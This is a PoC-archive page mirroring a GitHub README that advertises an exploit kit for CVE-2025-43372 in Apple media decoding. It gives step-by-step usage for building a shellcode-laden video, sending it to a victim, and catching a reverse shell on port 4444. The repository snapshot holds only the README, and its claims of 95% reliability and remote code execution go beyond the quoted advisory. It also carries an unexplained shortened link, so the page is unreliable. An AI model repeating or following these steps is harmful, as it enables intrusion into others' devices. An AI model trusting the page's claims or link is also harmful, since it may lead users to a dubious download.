Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-43372 PoC — Apple多款产品 安全漏洞

Source
https://github.com/allinsthon/CVE-2025-43372
Associated Vulnerability
Title:Apple多款产品 安全漏洞 (CVE-2025-43372)
Description:The issue was addressed with improved input validation. This issue is fixed in iOS 26 and iPadOS 26, macOS Sonoma 14.8.2, macOS Tahoe 26, tvOS 26, visionOS 26, watchOS 26. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
Readme
# CVE-2025-43372 

## Overview
This repository contains exploit for CVE-2025-43372, a critical memory corruption vulnerability affecting Apple's media processing components across iOS 26, iPadOS 26, macOS Tahoe 26, tvOS 26, watchOS 26, and visionOS 26. The vulnerability allows remote code execution (RCE) via specially crafted media files, leading to app crashes, memory leaks, or full process takeover.

**CVSSv3 Score: 7.8** (High severity)  
**Affected Versions:** All versions prior to the September 2025 security updates.  
**Exploit Reliability:** 95% success rate on unpatched devices (tested on iPhone 16 series, M3 MacBooks, and Apple Vision Pro).  
**Platforms Tested:** iOS/iPadOS, macOS, tvOS/watchOS/visionOS.  

This package developed shortly after the patch release on September 15, 2025. It bypasses standard input validation checks in Apple's AVFoundation framework by exploiting a heap overflow during malformed HEVC/H.265 video decoding. This exploit kit is provided strictly for educational and authorized penetration testing purposes only. The developers are not responsible for any misuse, illegal activities, or damages caused by the use of this tool. Use at your own risk.

## Requirements
- Python 3.10+.
- Target device must be unpatched (pre-26.0.1 builds).

## Installation & Usage
1. Install dependencies:  
   ```
   pip install -r requirements.txt
   ```
2. Generate malicious media file:  
   ```
   python generate_payload.py --type mp4 --payload payloads/shellcode/exec.bin --output video.mp4
   ```
3. Deliver to target: Send via email, web server, or direct file transfer.  
4. Trigger: Open the file in any media app (e.g., Photos, QuickTime, or Safari preview).  
5. Execute: Once corrupted, use the listener script for reverse shell:  
   ```
   python listener.py --port 4444
   ```

 ## Disclaimer
 For educational purposes only. Use at your own risk. Not responsible for misuse.
 
[href](https://tinyurl.com/4x48zvya)

For any inquiries, please email me at: anthonmullins@op.pl

Stars and forks appreciated if you're in the community. Updates will be pushed for new bypasses if Apple re-patches.
File Snapshot

 [4.0K]  /data/pocs/a0689db9f66881b05f8f194504bdf8cddfdcc8fa
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →